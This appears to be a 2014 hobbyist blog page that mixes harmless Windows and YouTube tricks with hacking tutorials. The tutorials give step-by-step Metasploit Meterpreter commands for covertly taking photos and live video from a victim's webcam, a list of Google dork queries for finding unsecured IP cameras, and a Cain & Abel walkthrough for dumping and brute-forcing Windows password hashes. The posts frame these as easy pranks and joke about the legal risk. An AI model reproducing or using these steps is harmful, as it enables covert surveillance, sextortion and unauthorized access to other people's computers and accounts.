Here I Will Tell U A Simple Trick For Downloading YouTube Videos :
Step 1 : Open Any Video
Step 2 : Now You have change the url of that video
Example :
www.youtube.com/video/adadsdsaddsada
now change this with
ssyoutube.com/video/adadsdsaddsada
After Doing This Hit Enter And You Will Be Redirected To The Download Page Just Select The Output Format and Quality…!!
Thursday, 25 September 2014
Download YouTube Videos
Saturday, 20 September 2014
Hack Webcam by Meterpreter
In early 2014, a hacker was sentenced to 18 months for doing just this to Miss Teen USA, 2013. He broke into the computer, took a few clicks and blackmailed the victim to send more photos. (Google it up for more information) While the exact method he used is unknown, it's very likely this exact method that we'll be trying out. The point of this tutorial is to show just how easy it really is. While developing your own hacks and discovering loop holes is a whole different level of hacking, quite a lot of hacking can be done just by knowing a surprisingly small number of things. Perhaps not even that, after all we can simply search an exploit in metasploit and a get a whole list of things that'll work. The hard part of hacking is breaking into a system while maintaining anonymity. Once that is done, we pretty much own the target system. Hacking is not about being a computer geek as much as being 'in the know'.
Our best friend Meterpreter is going to help us with this hack. With Meterpreter we can install a keylogger, hack the webcam and the list goes on and on. You can basically do almost anything that you can do on your own computer, to your victim. All we need for this hack, is to first break in with Metasploit and install meterpreter on their system. How do we do that?
After picking an attack module to exploit a vulnerability, we have the option to set a payload. The payload tells metasploit what to do on the victim's computer once it breaks in. Meterpreter is a payload. The command usually looks like:
Set payload windows/meterpreter/reverse_tcp
If the attack was successful, metasploit automatically installs meterpreter on the target system and we can move on to hacking the webcam, in this case. We can also get our meterpreter session by using exploits like Aurora (for IE6). After getting the meterpreter session in our command, you can follow the steps below to hack the webcam.
Step 1: Find if there is a webcam.
Metasploit's Meterpreter has a built-in module for searching and controlling the remote system's webcam (Because apparently there are so many creepy hackers that we now have this hack at our fingertips). We can start off by searching if the system even has a webcam or not.me. The command below is used for that, it also returns us the name of the webcam.
meterpreter > webcam_list
If a webcam was found, Meterpreter will them all out. Usually we just find one.
Step 2: Say Cheese!
If the last command gave us a webcam we can go ahead and snap a photo:
meterpreter > webcam_snap
If all went fine a picture will be saved in the directory: /opt/framework3/msf3 We can simply go there and see what we got. We can't do anything about the quality of the image, it all depends on the webcam. Still, better than nothing, right?
Step 3: Streaming video.
So we got a picture, let's see how to get a live video stream. We can do this by typing the command below: (We're using –p parameter to specify the directory we want to give to the video streaming file)
meterpreter > run webcam -p /var/www
This command fires up the victim's webcam and sends its video output to /var/www/webcam.htm. You can open up this file and check out what's going on at the other end in live video feed.
Another thing that deservers mention here is the little light that is often found next to many laptop cameras and on some separate webcams too. Will the light be turned on by this hack? It depends on the way the camera manufacture implemented the 'take a photo' and 'take a video' functions and on which software is set as default to use the camera. So this hack is not all that risk-free. But then again, what's life without a little risk? (Just kidding, people go to jail for this. Be careful.)
Protecting yourself
In 3 small commands we can peek into our victim's webcam. How to make sure this doesn't happen to you? This hack has a very complicated and highly technical flaw: It can be completely stopped by something as little as a tissue on the webcam.
Saturday, 13 September 2014
Make A Personal Log Book Using Notepad
Did you know that you can also use Notepad as a simple digital diary or a personal Log-Book ? Well, if you didn’t then follow the below mentioned steps to make one for yourself ! Open Notepad. Type .LOG (in capital letters) and hit enter. Save it with any name and close it. Open it again. When you open the file again you will see the current date and time being inserted automatically after the .LOG line. This will happen automatically every time you reopen the the notepad file.
Friday, 12 September 2014
Hack into Live Cameras Around the World
* inurl:”CgiStart?page=” * inurl:/view.shtml * intitle:”Live View / – AXIS * inurl:view/view.shtml * inurl:ViewerFrame?Mode= * inurl:ViewerFrame?Mode=Refresh * inurl:axis-cgi/jpg * inurl:axis-cgi/mjpg (motion-JPEG) (disconnected) * inurl:view/indexFrame.shtml * inurl:view/index.shtml * inurl:view/view.shtml * liveapplet * intitle:”live view” intitle:axis * intitle:liveapplet * allintitle:”Network Camera NetworkCamera” (disconnected) * intitle:axis intitle:”video server” * intitle:liveapplet inurl:LvAppl * intitle:”EvoCam” inurl:”webcam.html” * intitle:”Live NetSnap Cam-Server feed” * intitle:”Live View / – AXIS” * intitle:”Live View / – AXIS 206M” * intitle:”Live View / – AXIS 206W” * intitle:”Live View / – AXIS 210? * inurl:indexFrame.shtml Axis * inurl:”MultiCameraFrame?Mode=Motion” (disconnected) * intitle:start inurl:cgistart * intitle:”WJ-NT104 Main Page” * intitle:snc-z20 inurl:home/ * intitle:snc-cs3 inurl:home/ * intitle:snc-rz30 inurl:home/ * intitle:”sony network camera snc-p1? * intitle:”sony network camera snc-m1? * site:.viewnetcam.com -www.viewnetcam.com * intitle:”Toshiba Network Camera” user login * intitle:”netcam live image” (disconnected) * intitle:”i-Catcher Console – Web Monitor”2)Once you have picked one, simply copy it, and paste in on google. 3)Now choose any result and you will be seeing a live camera.
Thursday, 11 September 2014
World Trade Centre Attack In Notepad
As you might be knowing that the flightnumber of the plane that had hit World Trade Center on that dreadful day (9/11) was Q33NY. Now call this trick a coincidence or something else but whatever it is, it does startle us. Open Notepad. Type “Q33N” (without quotes) in capital letters. Increase the font size to 72. Change the Font to Wingdings. You will be amazed by the findings.
Thursday, 4 September 2014
Delete Recycle Bin
As we all know that there is no direct option in windows to remove the recycle bin from the desktop. So, here is the method to remove the Recycle Bin from your Desktop. Follow the Steps Below : Step1: Go to RUN (Window+R or Start->run)Type in there the following command "gpedit.msc"and press Enter : Step2: User Configuration>Administrative Templates> Desktop>Remove Recycle Bin from desktop Step3: NOW open RUN and type " gpupdate.exe " and hit Enter. A command prompt will open and process your query. Restart the system. The Recycle Bin icon is not anymore on your desktop.
Monday, 1 September 2014
Hack Administrator Password in Window XP
Just follow steps below. 1) Download Cain & Abel v2.0 from www.oxid.it and install it. 2)Start Cain 3)Click on Cracker tab , on the left choose LM & NTLM Hashes and click on + sign icon on toolbar then Dump NT Hashes from Local machine
4) Now you will see 5) After this will appear windows accounts , right click on account you want to break password and choose type of attack , in this example I chose brute force attack. Brute force actually means to start with a letter a and encrypting it. Then see if the encrypted strings match. If not then b, c,.. until we‘ve gotten to admin. Then the encrypted strings will match and we‘ll know that is the right password.Brute force attack is the slowest method of cracking, but there is no risk that you‘ll not find the password. The thing about brute force is that the time of cracking rises rapidly depending on how long the password is, how many characters are being used in it and so forth.